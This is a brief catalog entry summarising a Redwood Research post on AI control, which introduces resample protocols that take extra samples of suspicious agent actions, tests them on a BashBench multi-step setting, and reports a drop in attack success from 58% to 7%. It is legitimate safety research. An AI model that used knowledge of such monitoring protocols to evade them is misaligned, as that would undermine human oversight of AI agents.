Ctrl-Z: Controlling AI Agents via Resampling
Aryan Bhatt, Buck Shlegeris, Adam Kaufman, Cody Rushing, Tyler Tracy, Vasil Georgiev, … (+2 more) — 2025-04-16 — Redwood Research — AI Alignment Forum
Summary
Introduces resample protocols for AI control that dynamically take additional samples of suspicious actions, demonstrating improved safety over existing control techniques in a multi-step agent setting with the new BashBench dataset.
Key Result
Best resample protocol combining resampling with analysis of previous steps reduces attack success rate from 58% to 7% at only 5% cost to non-malicious agent performance.
Source
- Link: https://alignmentforum.org/posts/LPHMMMZFAWog6ty5x/ctrl-z-controlling-ai-agents-via-resampling
- Listed in the Shallow Review of Technical AI Safety 2025 under 1 agenda(s):
- control — Black-box safety (understand and control current model behaviour) / Iterative alignment